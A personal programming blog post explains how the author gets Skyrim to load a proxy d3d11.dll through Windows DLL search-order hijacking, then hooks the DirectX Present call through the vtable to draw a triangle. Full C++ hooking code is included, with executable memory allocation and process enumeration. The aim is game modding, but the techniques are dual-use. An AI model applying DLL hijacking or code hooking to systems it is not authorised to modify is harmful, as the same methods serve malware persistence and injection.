The blog of Kyle Halladay

Hooking and Hijacking DirectX 11 Functions In Skyrim

2021-07-14T00:00:00+00:00

My last post was a deep dive into the nuts and bolts of how function hooking works, so for my next project I wanted to focus less on how hooking works, and more on how to use it to do something cool. I started looking at function hooking because I wanted to understand how ReShade works, so I decided that I’d take a baby step closer to that goal and draw a triangle across the screen in a real game. I’m a huge Skyrim fan, and it seemed like as good a candidate as any, so that’s what I went with.

This post is going to take it for granted that you already know how function hooking works. If you don’t, and that sounds interesting, see my previous post, or my hooking-by-example project.

Note: you're looking for modern c++, clean code or best practices, turn back now

As usual with things I write about, all the code for this project is up on github, so if you just want to see the code, have at it!

DLL Hijacking is the New DLL Injection

I’ve built a few projects that have used process injection to get programs to run code they didn’t intend to, so for this project I decided to try something new. Instead of injecting a dll containing the code to draw a triangle, I decided to abuse Windows’ DLL search order to get Skyrim to load a dll full of my code during startup.

Whenever a program loads a DLL by name, it looks in a number of pre-set locations for that DLL, and loads the first one it finds. I knew that Skyrim uses DirectX 11 for it’s renderer, which means that it loads d3d11.dll during startup. My plan was to create my own dll, call it d3d11.dll, and place it in the same directory as Skyrim’s executable.

This dll would sit in between the game code and the real version of d3d11.dll. For functions I didn’t want to add any additional sauce to, my code would call the real dll’s version of that function and return the result. In cases where I wanted to add my own logic, I could intercept any function call I wanted and insert that logic before or after calling the real D3D11.dll’s function. DLLs that do this are called “proxy” dlls. This isn’t a new idea by any means, there’s tons of projects and literature out there for using proxy dlls for everything (including game hacking). Also I stole the idea from ReShade.

Creating a proxy version of d3d11.dll that contains every function eported by the actual library is a chunk of work, but luckily I didn’t have to do that. Instead, I fired up CFF Explorer and took a look at the functions Skyrim actually imports. It turns out this is just a single D3D11.dll export: D3D11CreateDeviceAndSwapChain. No complaints here.

I had never built a proxy dll before, so my first step was to make an empty one (with just a dllmain function), and see what happens if a progrma loads a dll that doesn’t have the functions it expects it to have. This works as well as you might expect. I put a call to MessageBox() in DLLMain to see if things even progressed that far. They didnt.

I changed my system's language to french once, some things have never changed back

My next step was to try to write a proxy dll that didn’t do anything except forward all calls to D3D11CreateDeviceAndSwapChain to the real version of that function, and return the result. The goal here being that I could get Skyrim to load my dll (confirmed by a call to MessageBox in DLLMain), and run like normal. This is a relatively straightforward process. My .def file already declared that the proxy dll was exporting a function called D3D11CreateDeviceAndSwapChain, so all I had to do was create that function with the right type signature, and in the function body, load the real D3D11 library and call the real D3D11CreateDeviceAndSwapChain function.

typedef HRESULT(__stdcall* fn_D3D11CreateDeviceAndSwapChain)(
  IDXGIAdapter*,
  D3D_DRIVER_TYPE,
  HMODULE,
  UINT,
  const D3D_FEATURE_LEVEL*,
  UINT,
  UINT,
  const DXGI_SWAP_CHAIN_DESC*,
  IDXGISwapChain**,
  ID3D11Device**,
  D3D_FEATURE_LEVEL*,
  ID3D11DeviceContext**);


fn_D3D11CreateDeviceAndSwapChain LoadD3D11AndGetOriginalFuncPointer()
{
  char path[MAX_PATH];
  if (!GetSystemDirectoryA(path, MAX_PATH)) return nullptr;

  strcat_s(path, MAX_PATH * sizeof(char), "\\d3d11.dll");
  HMODULE d3d_dll = LoadLibraryA(path); 

  if (!d3d_dll)
  {
    MessageBox(NULL, TEXT("Could Not Locate Original D3D11 DLL"), TEXT("Darn"), 0);
    return nullptr;
  }

  return (fn_D3D11CreateDeviceAndSwapChain)GetProcAddress(d3d_dll, TEXT("D3D11CreateDeviceAndSwapChain"));
}


extern "C" HRESULT __stdcall D3D11CreateDeviceAndSwapChain(
  IDXGIAdapter * pAdapter,
  D3D_DRIVER_TYPE            DriverType,
  HMODULE                    Software,
  UINT                       Flags,
  const D3D_FEATURE_LEVEL * pFeatureLevels,
  UINT                       FeatureLevels,
  UINT                       SDKVersion,
  const DXGI_SWAP_CHAIN_DESC * pSwapChainDesc,
  IDXGISwapChain * *ppSwapChain,
  ID3D11Device * *ppDevice,
  D3D_FEATURE_LEVEL * pFeatureLevel,
  ID3D11DeviceContext * *ppImmediateContext
)
{   
  fn_D3D11CreateDeviceAndSwapChain D3D11CreateDeviceAndSwapChain_Orig = LoadD3D11AndGetOriginalFuncPointer();
  
  HRESULT res = D3D11CreateDeviceAndSwapChain_Orig(
    pAdapter, 
    DriverType, 
    Software, 
    Flags, 
    pFeatureLevels, 
    FeatureLevels, 
    SDKVersion, 
    pSwapChainDesc, 
    ppSwapChain, 
    ppDevice, 
    pFeatureLevel, 
    ppImmediateContext);
  
  return res;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD ul_reason_for_call, LPVOID lpvReserved)
{
  if (ul_reason_for_call == DLL_PROCESS_ATTACH)
  {
    MessageBox(NULL, TEXT("Loaded Proxy DLL"), TEXT("Success"), 0);
  }

  return true;
}

Pasting the dll created with the code next to the Skyrim binary (for me: C:\Program Files (x86)\Steam\steamapps\common\Skyrim Special Edition) and then launching the game through Steam successfully popped the message box, and proceeded to play like normal. Perfect.

Finding A Function To Hook

Now that I had my proxy dll minimally working, it was time to use it to do something interesting. I figured it would be pretty easy to add some more code to D3D11CreateDeviceAndSwapChain to set up all the buffers and shaders needed to render a triangle, and then intercept a call to IDXGISwapchain::Present to insert a draw call for that triangle at the end of a frame. There was just one small problem: I had no idea what the address of IDXGISwapchain::Present was, and this is where things take a turn for the hacky.

IDXGISwapChain isn’t really a class, it’s a COM interface. The ppSwapChain pointer returned by D3D11CreateDeviceAndSwapChain is a pointer to something that implements said interface, but you never get to see the actual concrete type pointed to by that pointer, so I couldn’t just make a function pointer to the concrete implementation of Present(). The one saving grace in all this is that i knew that whatever ppSwapChain pointed to, it had a vtable. Somewhere in memory, I already had a pointer to the Present function, I just needed to figure out how to get it.

First, I needed to get a pointer to the vtable for the swapchain that gets created by the call to CreateDeviceAndSwapChain. This meant adding the following perfectly reasonable line of code to my proxy CreateDeviceAndSwapChain function (right before the return statement):

void** swapChainVTable = *reinterpret_cast<void***>(*ppSwapChain);

Then I threw a breakpoint right after that line so I could see the value of swapChainVTable in the VS debugger. By itself, this isn’t super helpful, since it’s just a pointer to the first element in the vtable, but in the course of doing this I learned a new Visual Studio trick to help out here. If you add a watch for a variable, and then add a suffix to the name of that watch like “, 50”, Visual Studio will give you a debug view that assumes swapChainVTable is a pointer to an array, and show you the next 50 elements in that array. So I created a watch for “swapChainVTable,50” which showed me the first 50 pointers in the swapchain object’s vtable.

This by itself wasn’t be the most useful (although I guess I could have figured out the right function by trial and error). Microsoft publishes the symbols for D3D11.dll though, so I had VS grab those from the Microsoft symbol server and used them to get the function names that corresponded with the vtable memory addresses. Once I had that, I could see that the Present function is the 9th element in swapChain vtable.

~~Of course, Microsoft could update DXGI and change the ordering of function in the vtable at any time, but it works for now, so yolo.~~ [Edit: As @__silent_ pointed out on twitter, this is rather unlikely, since it would require a whole new DXGI SwapChain interface that didn’t inherit from any previous versions of IDXGISwapChain]

Once I had the actual address, I could re-use the hooking code from my last post and redirect all calls to Present to my own function, which I could use to issue a draw call for the custom triangle prior to actually calling Present().

HRESULT DXGISwapChain_Present_Hook(IDXGISwapChain* thisPtr, UINT SyncInterval, UINT Flags)
{
  //triangle drawing code will go here

  //this is a specific quirk of my hooking code,
  //the address for the function being hooked is stored in a thread-local stack,
  //Getting the address of the original function means calling PopAddress.
  //more details in the "Hooking By Example" project on my github
  fn_DXGISwapChain_Present DXGISwapChain_Present_Orig;
  PopAddress(uint64_t(&DXGISwapChain_Present_Orig));

  //actuall call Present
  HRESULT r = DXGISwapChain_Present_Orig(thisPtr, SyncInterval, Flags);
  return r;
}

extern "C" HRESULT __stdcall D3D11CreateDeviceAndSwapChain(
  IDXGIAdapter * pAdapter,
  D3D_DRIVER_TYPE            DriverType,
  HMODULE                    Software,
  UINT                       Flags,
  const D3D_FEATURE_LEVEL * pFeatureLevels,
  UINT                       FeatureLevels,
  UINT                       SDKVersion,
  const DXGI_SWAP_CHAIN_DESC * pSwapChainDesc,
  IDXGISwapChain * *ppSwapChain,
  ID3D11Device * *ppDevice,
  D3D_FEATURE_LEVEL * pFeatureLevel,
  ID3D11DeviceContext * *ppImmediateContext
)
{
  fn_D3D11CreateDeviceAndSwapChain D3D11CreateDeviceAndSwapChain_Orig = LoadD3D11AndGetOriginalFuncPointer();

  HRESULT res = D3D11CreateDeviceAndSwapChain_Orig(pAdapter, DriverType, Software, Flags, pFeatureLevels, FeatureLevels, SDKVersion, pSwapChainDesc, ppSwapChain, ppDevice, pFeatureLevel, ppImmediateContext);

  void** swapChainVTable = *reinterpret_cast<void***>(*ppSwapChain);  
  
  //redirects calls to swapChainVTable[8] to DXGISwapChain_Present_Hook
  //for more details about hooking, see my previous blog post
  InstallHook(swapChainVTable[8], DXGISwapChain_Present_Hook);

  return res;
}

Actually Drawing a Triangle

Once I had the IDXGISwapChain::Present hook working, the rest of this project fell into place pretty quickly. I added all the normal D3D11 calls for creating a mesh, compiling shaders, etc to CreateDeviceAndSwapChain (after device creation), and then added the draw commands for the triangle to the Present hook, before having that hook call the regular Present function. Rather than try to shove hlsl code in my cpp files, I just had the code look for a folder called “hook_content” in the same directory as the hooked binary, and load the shaders from there. Yet another idea I stole from ReShade.

The resulting code is simple enough to be a D3D11 tutorial project, so I’m just going to paste it below for reference and not waste much time talking about it. I’ve also included all the hooking code too. As mentioned, the entire project (including the test d3d11 app I built) is also on github.

Full DX11 Hooking Code (Click To Expand)

#pragma once
#include <Windows.h>
#include "debug.h"
#include <stdint.h>
#include <d3dcompiler.h>
#include <d3d11.h>
#include <d3d11_4.h>
#include <shlwapi.h>
#include "hooking.h"

#pragma comment (lib, "Shlwapi.lib") //for PathRemoveFileSpecA
#pragma comment(lib, "d3dcompiler.lib")


typedef HRESULT(__stdcall* fn_D3D11CreateDeviceAndSwapChain)(
  IDXGIAdapter*,
  D3D_DRIVER_TYPE,
  HMODULE,
  UINT,
  const D3D_FEATURE_LEVEL*,
  UINT,
  UINT,
  const DXGI_SWAP_CHAIN_DESC*,
  IDXGISwapChain**,
  ID3D11Device**,
  D3D_FEATURE_LEVEL*,
  ID3D11DeviceContext**);

typedef HRESULT(__stdcall* fn_DXGISwapChain_Present)(IDXGISwapChain*, UINT, UINT);

IDXGISwapChain* swapChain = nullptr;
ID3D11Device5* device = nullptr;
ID3D11DeviceContext4* devCon = nullptr;
ID3D10Blob* vs_blob = nullptr;
ID3D11VertexShader* vs = nullptr;
ID3D10Blob* ps_blob = nullptr;
ID3D11PixelShader* ps = nullptr;
ID3D11Buffer* vertex_buffer = nullptr;
ID3D11InputLayout* vertLayout = nullptr;
ID3D11RasterizerState* SolidRasterState = nullptr;
ID3D11DepthStencilState* SolidDepthStencilState = nullptr;

HRESULT DXGISwapChain_Present_Hook(IDXGISwapChain* thisPtr, UINT SyncInterval, UINT Flags)
{
  devCon->VSSetShader(vs, 0, 0);
  devCon->PSSetShader(ps, 0, 0);
  devCon->IASetInputLayout(vertLayout);
  devCon->RSSetState(SolidRasterState);
  devCon->OMSetDepthStencilState(SolidDepthStencilState, 0);

  UINT stride = sizeof(float) * 6;
  UINT offset = 0;
  devCon->IASetVertexBuffers(0, 1, &vertex_buffer, &stride, &offset);
  devCon->IASetPrimitiveTopology(D3D11_PRIMITIVE_TOPOLOGY_TRIANGLELIST);
  devCon->Draw(3, 0);


  fn_DXGISwapChain_Present DXGISwapChain_Present_Orig;
  PopAddress(uint64_t(&DXGISwapChain_Present_Orig));

  HRESULT r = DXGISwapChain_Present_Orig(thisPtr, SyncInterval, Flags);
  return r;
}


void LoadShaders()
{
  {
    char filepath[512];
    HMODULE hModule = GetModuleHandle(NULL);
    GetModuleFileNameA(hModule, filepath, 512);
    PathRemoveFileSpecA(filepath);

    strcat_s(filepath, 512, "\\hook_content\\passthrough_vs.shader");

    wchar_t wPath[513];
    size_t outSize;

    mbstowcs_s(&outSize, &wPath[0], strlen(filepath) + 1, filepath, strlen(filepath));
    ID3D10Blob* compileErrors = nullptr;

    HRESULT err = D3DCompileFromFile(wPath, 0, 0, "main", "vs_5_0", 0, 0, &vs_blob, &compileErrors);
    if (compileErrors != nullptr && compileErrors)
    {
      ID3D10Blob* outErrorsDeref = compileErrors;
      OutputDebugStringA((char*)compileErrors->GetBufferPointer());
    }

    err = device->CreateVertexShader(vs_blob->GetBufferPointer(), vs_blob->GetBufferSize(), NULL, &vs);
    check(err == S_OK);
  }
  {
    char filepath[512];
    HMODULE hModule = GetModuleHandle(NULL);
    GetModuleFileNameA(hModule, filepath, 512);
    PathRemoveFileSpecA(filepath);

    strcat_s(filepath, 512, "\\hook_content\\vertex_color_ps.shader");

    wchar_t wPath[513];
    size_t outSize;

    mbstowcs_s(&outSize, &wPath[0], strlen(filepath) + 1, filepath, strlen(filepath));
    ID3D10Blob* compileErrors;

    HRESULT err = D3DCompileFromFile(wPath, 0, 0, "main", "ps_5_0", 0, 0, &ps_blob, &compileErrors);
    if (compileErrors != nullptr && compileErrors)
    {
      ID3D10Blob* outErrorsDeref = compileErrors;
      OutputDebugStringA((char*)compileErrors->GetBufferPointer());
    }

    err = device->CreatePixelShader(ps_blob->GetBufferPointer(), ps_blob->GetBufferSize(), NULL, &ps);
    check(err == S_OK);
  }
}


void CreateMesh()
{
  const float vertData[] =
  {
    -1, -1, 0.1,  1,0,0,
    1, 1, 0.1,  0,1,0,
    -1, 1, 0.1,  0,0,1
  };

  D3D11_BUFFER_DESC vertBufferDesc;
  ZeroMemory(&vertBufferDesc, sizeof(vertBufferDesc));
  vertBufferDesc.Usage = D3D11_USAGE_DEFAULT;
  vertBufferDesc.ByteWidth = sizeof(float) * 6 * 3; //6 floats per vert, 3 verts
  vertBufferDesc.BindFlags = D3D11_BIND_VERTEX_BUFFER;
  vertBufferDesc.CPUAccessFlags = 0;
  vertBufferDesc.MiscFlags = 0;

  D3D11_SUBRESOURCE_DATA vertBufferData;
  ZeroMemory(&vertBufferData, sizeof(vertBufferData));
  vertBufferData.pSysMem = vertData;

  HRESULT res = device->CreateBuffer(&vertBufferDesc, &vertBufferData, &vertex_buffer);
  check(res == S_OK);
}


void CreateInputLayout()
{
  D3D11_INPUT_ELEMENT_DESC vertElements[] =
  {
    {"POSITION", 0, DXGI_FORMAT_R32G32B32_FLOAT, 0, 0,D3D11_INPUT_PER_VERTEX_DATA, 0},
    {"COLOR", 0, DXGI_FORMAT_R32G32B32_FLOAT, 0, 12, D3D11_INPUT_PER_VERTEX_DATA, 0}
  };

  HRESULT err = device->CreateInputLayout(vertElements, _countof(vertElements), vs_blob->GetBufferPointer(), vs_blob->GetBufferSize(), &vertLayout);
  check(err == S_OK);
}

void CreateRasterizerAndDepthStates()
{
  D3D11_RASTERIZER_DESC soliddesc;
  ZeroMemory(&soliddesc, sizeof(D3D11_RASTERIZER_DESC));
  soliddesc.FillMode = D3D11_FILL_SOLID;
  soliddesc.CullMode = D3D11_CULL_NONE;
  HRESULT err = device->CreateRasterizerState(&soliddesc, &SolidRasterState);
  check(err == S_OK);

  D3D11_DEPTH_STENCIL_DESC depthDesc;
  ZeroMemory(&depthDesc, sizeof(D3D11_DEPTH_STENCIL_DESC));
  depthDesc.DepthEnable = true;
  depthDesc.DepthWriteMask = D3D11_DEPTH_WRITE_MASK_ALL;
  depthDesc.DepthFunc = D3D11_COMPARISON_ALWAYS;
  err = device->CreateDepthStencilState(&depthDesc, &SolidDepthStencilState);
  check(err == S_OK);
}

fn_D3D11CreateDeviceAndSwapChain LoadD3D11AndGetOriginalFuncPointer()
{
  char path[MAX_PATH];
  if (!GetSystemDirectoryA(path, MAX_PATH)) return nullptr;

  strcat_s(path, MAX_PATH * sizeof(char), "\\d3d11.dll");
  HMODULE d3d_dll = LoadLibraryA(path); 

  if (!d3d_dll)
  {
    MessageBox(NULL, TEXT("Could Not Locate Original D3D11 DLL"), TEXT("Darn"), 0);
    return nullptr;
  }

  return (fn_D3D11CreateDeviceAndSwapChain)GetProcAddress(d3d_dll, TEXT("D3D11CreateDeviceAndSwapChain"));
}

inline void** get_vtable_ptr(void* obj)
{
  return *reinterpret_cast<void***>(obj);
}

extern "C" HRESULT __stdcall D3D11CreateDeviceAndSwapChain(
  IDXGIAdapter * pAdapter,
  D3D_DRIVER_TYPE            DriverType,
  HMODULE                    Software,
  UINT                       Flags,
  const D3D_FEATURE_LEVEL * pFeatureLevels,
  UINT                       FeatureLevels,
  UINT                       SDKVersion,
  const DXGI_SWAP_CHAIN_DESC * pSwapChainDesc,
  IDXGISwapChain * *ppSwapChain,
  ID3D11Device * *ppDevice,
  D3D_FEATURE_LEVEL * pFeatureLevel,
  ID3D11DeviceContext * *ppImmediateContext
)
{
  MessageBox(NULL, TEXT("Calling D3D11CreateDeviceAndSwapChain"), TEXT("Ok"), 0);

  fn_D3D11CreateDeviceAndSwapChain D3D11CreateDeviceAndSwapChain_Orig = LoadD3D11AndGetOriginalFuncPointer();

  HRESULT res = D3D11CreateDeviceAndSwapChain_Orig(pAdapter, DriverType, Software, Flags, pFeatureLevels, FeatureLevels, SDKVersion, pSwapChainDesc, ppSwapChain, ppDevice, pFeatureLevel, ppImmediateContext);

  HRESULT hr = (*ppDevice)->QueryInterface(__uuidof(ID3D11Device5), (void**)&device);
  hr = (*ppImmediateContext)->QueryInterface(__uuidof(ID3D11DeviceContext), (void**)&devCon);

  LoadShaders();
  CreateMesh();
  CreateInputLayout();
  CreateRasterizerAndDepthStates();

  swapChain = *ppSwapChain;
  void** swapChainVTable = get_vtable_ptr(swapChain);
  
  InstallHook(swapChainVTable[8], DXGISwapChain_Present_Hook);
  //present is [8];

  return res;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD ul_reason_for_call, LPVOID lpvReserved)
{
  if (ul_reason_for_call == DLL_PROCESS_ATTACH)
  {
    MessageBox(NULL, TEXT("Target app has loaded your proxy d3d11.dll and called DllMain. If you're launching Skyrim via steam, you need to dismiss this popup quickly, otherwise you get a load error"), TEXT("Success"), 0);
  }

  return true;
}

Hooking Code (Click To Expand)

Hooking.h:

#pragma once
#include <Windows.h>
#include <stdint.h>


void InstallHook(void* func2hook, void* payloadFunc);
__declspec(noinline) void PopAddress(uint64_t trampolinePtr);

Hooking.cpp:

#include "hooking.h"
#include <Windows.h>
#include <stack>
#include <stdio.h>
#include <memoryapi.h>
#include <wow64apiset.h> // for checking is process is 64 bit
#include <TlHelp32.h> //for PROCESSENTRY32, needs to be included after windows.h
#include <Psapi.h>
#include <stdint.h>
#include "capstone/x86.h"
#include "capstone/capstone.h"
#include "debug.h"

thread_local std::stack<uint64_t> hookJumpAddresses;


#if _WIN64
typedef uint64_t addr_t;
#else 
typedef uint32_t addr_t;
#endif

bool IsProcess64Bit(HANDLE process)
{
  BOOL isWow64 = false;
  IsWow64Process(process, &isWow64);

  if (isWow64)
  {
    //process is 32 bit, running on 64 bit machine
    return false;
  }
  else
  {
    SYSTEM_INFO sysInfo;
    GetSystemInfo(&sysInfo);
    return sysInfo.wProcessorArchitecture == PROCESSOR_ARCHITECTURE_AMD64;
  }
}

void* AllocPageInTargetProcess(HANDLE process)
{
  SYSTEM_INFO sysInfo;
  GetSystemInfo(&sysInfo);
  int PAGE_SIZE = sysInfo.dwPageSize;

  void* newPage = VirtualAllocEx(process, NULL, PAGE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  return newPage;
}


void* AllocPage()
{
  SYSTEM_INFO sysInfo;
  GetSystemInfo(&sysInfo);
  int PAGE_SIZE = sysInfo.dwPageSize;

  void* newPage = VirtualAlloc(NULL, PAGE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  return newPage;
}

void* AllocatePageNearAddressRemote(HANDLE handle, void* targetAddr)
{
  check(IsProcess64Bit(handle));

  SYSTEM_INFO sysInfo;
  GetSystemInfo(&sysInfo);
  const uint64_t PAGE_SIZE = sysInfo.dwPageSize;

  uint64_t startAddr = (uint64_t(targetAddr) & ~(PAGE_SIZE - 1)); //round down to nearest page boundary
  uint64_t minAddr = min(startAddr - 0x7FFFFF00, (uint64_t)sysInfo.lpMinimumApplicationAddress);
  uint64_t maxAddr = max(startAddr + 0x7FFFFF00, (uint64_t)sysInfo.lpMaximumApplicationAddress);

  uint64_t startPage = (startAddr - (startAddr % PAGE_SIZE));

  uint64_t pageOffset = 1;
  while (1)
  {
    uint64_t byteOffset = pageOffset * PAGE_SIZE;
    uint64_t highAddr = startPage + byteOffset;
    uint64_t lowAddr = (startPage > byteOffset) ? startPage - byteOffset : 0;

    bool needsExit = highAddr > maxAddr && lowAddr < minAddr;

    if (highAddr < maxAddr)
    {
      void* outAddr = VirtualAllocEx(handle, (void*)highAddr, (size_t)PAGE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
      if (outAddr)
        return outAddr;
    }

    if (lowAddr > minAddr)
    {
      void* outAddr = VirtualAllocEx(handle, (void*)lowAddr, (size_t)PAGE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
      if (outAddr != nullptr)
        return outAddr;
    }

    pageOffset++;

    if (needsExit)
    {
      break;
    }
  }

  return nullptr;
}

void* AllocatePageNearAddress(void* targetAddr)
{
  return AllocatePageNearAddressRemote(GetCurrentProcess(), targetAddr);
}

//I use subst to alias my development folder to W: 
//this will rebase any virtual drives made by subst to
//their actual drive equivalent, to prevent conflicts. Likely
//not important for most people and can be ignored
void RebaseVirtualDrivePath(const char* path, char* outBuff, size_t outBuffSize)
{
  memset(outBuff, 0, outBuffSize);

  char driveLetter[3] = { 0 };
  memcpy(driveLetter, path, 2);

  char deviceDrive[512];
  QueryDosDevice(driveLetter, deviceDrive, 512);

  const char* virtualDrivePrefix = "\\??\\";
  char* prefix = strstr(deviceDrive, virtualDrivePrefix);
  if (prefix)
  {
    size_t replacementLen = strlen(deviceDrive) - strlen(virtualDrivePrefix);
    size_t rebasedPathLen = replacementLen + strlen(path) - 2;
    check(rebasedPathLen < outBuffSize);
    memcpy(outBuff, deviceDrive + strlen(virtualDrivePrefix), replacementLen);
    memcpy(outBuff + replacementLen, &path[2], strlen(path) - 2);
  }
  else
  {
    check(strlen(path) < outBuffSize);
    memcpy(outBuff, path, strlen(path));
  }
}

//returns the first module called "name" -> only searches for dll name, not whole path
//ie: somepath/subdir/mydll.dll can be searched for with "mydll.dll"
HMODULE FindModuleInProcess(HANDLE process, const char* name)
{
  char* lowerCaseName = _strdup(name);
  _strlwr_s(lowerCaseName, strlen(name) + 1);

  HMODULE remoteProcessModules[1024];
  DWORD numBytesWrittenInModuleArray = 0;
  BOOL success = EnumProcessModules(process, remoteProcessModules, sizeof(HMODULE) * 1024, &numBytesWrittenInModuleArray);

  if (!success)
  {
    fprintf(stderr, "Error enumerating modules on target process. Error Code %lu \n", GetLastError());
    DebugBreak();
  }

  DWORD numRemoteModules = numBytesWrittenInModuleArray / sizeof(HMODULE);
  CHAR remoteProcessName[256];
  GetModuleFileNameEx(process, NULL, remoteProcessName, 256); //a null module handle gets the process name
  _strlwr_s(remoteProcessName, 256);

  MODULEINFO remoteProcessModuleInfo;
  HMODULE remoteProcessModule = 0; //An HMODULE is just the DLL's base address 

  for (DWORD i = 0; i < numRemoteModules; ++i)
  {
    CHAR moduleName[256];
    CHAR absoluteModuleName[256];
    CHAR rebasedPath[256] = { 0 };
    GetModuleFileNameEx(process, remoteProcessModules[i], moduleName, 256);
    _strlwr_s(moduleName, 256);
    char* lastSlash = strrchr(moduleName, '\\');
    if (!lastSlash) lastSlash = strrchr(moduleName, '/');

    char* dllName = lastSlash + 1;

    if (strcmp(dllName, lowerCaseName) == 0)
    {
      remoteProcessModule = remoteProcessModules[i];

      success = GetModuleInformation(process, remoteProcessModules[i], &remoteProcessModuleInfo, sizeof(MODULEINFO));
      check(success);
      free(lowerCaseName);
      return remoteProcessModule;
    }
    //the following string operations are to account for cases where GetModuleFileNameEx
    //returns a relative path rather than an absolute one, the path we get to the module
    //is using a virtual drive letter (ie: one created by subst) rather than a real drive
    char* err = _fullpath(absoluteModuleName, moduleName, 256);
    check(err);
  }

  free(lowerCaseName);
  return 0;

}

void PrintModulesForProcess(HANDLE process)
{
  HMODULE remoteProcessModules[1024];
  DWORD numBytesWrittenInModuleArray = 0;
  BOOL success = EnumProcessModules(process, remoteProcessModules, sizeof(HMODULE) * 1024, &numBytesWrittenInModuleArray);

  if (!success)
  {
    fprintf(stderr, "Error enumerating modules on target process. Error Code %lu \n", GetLastError());
    DebugBreak();
  }

  DWORD numRemoteModules = numBytesWrittenInModuleArray / sizeof(HMODULE);
  HMODULE remoteProcessModule = 0; //An HMODULE is just the DLL's base address 

  for (DWORD i = 0; i < numRemoteModules; ++i)
  {
    CHAR moduleName[256];
    CHAR absoluteModuleName[256];
    GetModuleFileNameEx(process, remoteProcessModules[i], moduleName, 256);

    //the following string operations are to account for cases where GetModuleFileNameEx
    //returns a relative path rather than an absolute one, the path we get to the module
    //is using a virtual drive letter (ie: one created by subst) rather than a real drive
    char* err = _fullpath(absoluteModuleName, moduleName, 256);
    check(err);
    printf("%s\n", absoluteModuleName);
  }
}

HMODULE GetBaseModuleForProcess(HANDLE process)
{
  HMODULE remoteProcessModules[1024];
  DWORD numBytesWrittenInModuleArray = 0;
  BOOL success = EnumProcessModules(process, remoteProcessModules, sizeof(HMODULE) * 1024, &numBytesWrittenInModuleArray);

  if (!success)
  {
    fprintf(stderr, "Error enumerating modules on target process. Error Code %lu \n", GetLastError());
    DebugBreak();
  }

  DWORD numRemoteModules = numBytesWrittenInModuleArray / sizeof(HMODULE);
  CHAR remoteProcessName[256];
  GetModuleFileNameEx(process, NULL, remoteProcessName, 256); //a null module handle gets the process name
  _strlwr_s(remoteProcessName, 256);

  MODULEINFO remoteProcessModuleInfo;
  HMODULE remoteProcessModule = 0; //An HMODULE is just the DLL's base address 

  for (DWORD i = 0; i < numRemoteModules; ++i)
  {
    CHAR moduleName[256];
    CHAR absoluteModuleName[256];
    CHAR rebasedPath[256] = { 0 };
    GetModuleFileNameEx(process, remoteProcessModules[i], moduleName, 256);

    //the following string operations are to account for cases where GetModuleFileNameEx
    //returns a relative path rather than an absolute one, the path we get to the module
    //is using a virtual drive letter (ie: one created by subst) rather than a real drive
    char* err = _fullpath(absoluteModuleName, moduleName, 256);
    check(err);

    RebaseVirtualDrivePath(absoluteModuleName, rebasedPath, 256);
    _strlwr_s(rebasedPath, 256);

    if (strcmp(remoteProcessName, rebasedPath) == 0)
    {
      remoteProcessModule = remoteProcessModules[i];

      success = GetModuleInformation(process, remoteProcessModules[i], &remoteProcessModuleInfo, sizeof(MODULEINFO));
      if (!success)
      {
        fprintf(stderr, "Error getting module information for remote process module\n");
        DebugBreak();
      }
      break;
    }
  }

  return remoteProcessModule;
}

DWORD FindPidByName(const char* name)
{
  HANDLE h;
  PROCESSENTRY32 singleProcess;
  h = CreateToolhelp32Snapshot( //takes a snapshot of specified processes
    TH32CS_SNAPPROCESS, //get all processes
    0); //ignored for SNAPPROCESS

  singleProcess.dwSize = sizeof(PROCESSENTRY32);

  do {

    if (strcmp(singleProcess.szExeFile, name) == 0)
    {
      DWORD pid = singleProcess.th32ProcessID;
      CloseHandle(h);
      return pid;
    }

  } while (Process32Next(h, &singleProcess));

  CloseHandle(h);

  return 0;
}

uint32_t WriteMovToRCX(uint8_t* dst, uint64_t val)
{
  check(IsProcess64Bit(GetCurrentProcess()));

  uint8_t movAsmBytes[] =
  {
    0x48, 0xB9, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, //movabs 64 bit value into rcx
  };
  memcpy(&movAsmBytes[2], &val, sizeof(uint64_t));
  memcpy(dst, &movAsmBytes, sizeof(movAsmBytes));

  return sizeof(movAsmBytes);

}

uint32_t WriteSaveArgumentRegisters(uint8_t* dst)
{
  uint8_t asmBytes[] =
  {
    0x51, //push rcx
    0x52, //push rdx
    0x41, 0x50, //push r8
    0x41, 0x51, //push r9
    0x48, 0x83, 0xEC, 0x40, //sub rsp, 64 -> space for xmm registers
    0x0F, 0x11, 0x04, 0x24, // movups xmmword ptr [rsp],xmm0
    0x0F, 0x11, 0x4C, 0x24, 0x10, //movups xmmword ptr [rsp+10h],xmm1
    0x0F, 0x11, 0x54, 0x24, 0x20, //movups xmmword ptr [rsp+20h],xmm2
    0x0F, 0x11, 0x5C, 0x24, 0x30 //movups  xmmword ptr [rsp+30h],xmm3
  };

  memcpy(dst, &asmBytes, sizeof(asmBytes));
  return sizeof(asmBytes);
}

uint32_t WriteRestoreArgumentRegisters(uint8_t* dst)
{

  uint8_t asmBytes[] =
  {
    0x0F, 0x10, 0x04, 0x24, //movups xmm0,xmmword ptr[rsp]
    0x0F, 0x10, 0x4C, 0x24, 0x10,//movups xmm1,xmmword ptr[rsp + 10h]
    0x0F, 0x10, 0x54, 0x24, 0x20,//movups xmm2,xmmword ptr[rsp + 20h]
    0x0F, 0x10, 0x5C, 0x24, 0x30,//movups xmm3,xmmword ptr[rsp + 30h]
    0x48, 0x83, 0xC4, 0x40,//add rsp,40h
    0x41, 0x59,//pop r9
    0x41, 0x58,//pop r8
    0x5A,//pop rdx
    0x59 //pop rcx
  };

  memcpy(dst, &asmBytes, sizeof(asmBytes));
  return sizeof(asmBytes);
}

uint32_t WriteAddRSP32(uint8_t* dst)
{
  uint8_t addAsmBytes[] =
  {
    0x48, 0x83, 0xC4, 0x20
  };
  memcpy(dst, &addAsmBytes, sizeof(addAsmBytes));
  return sizeof(addAsmBytes);
}

uint32_t WriteSubRSP32(uint8_t* dst)
{
  uint8_t subAsmBytes[] =
  {
    0x48, 0x83, 0xEC, 0x20
  };
  memcpy(dst, &subAsmBytes, sizeof(subAsmBytes));
  return sizeof(subAsmBytes);
}

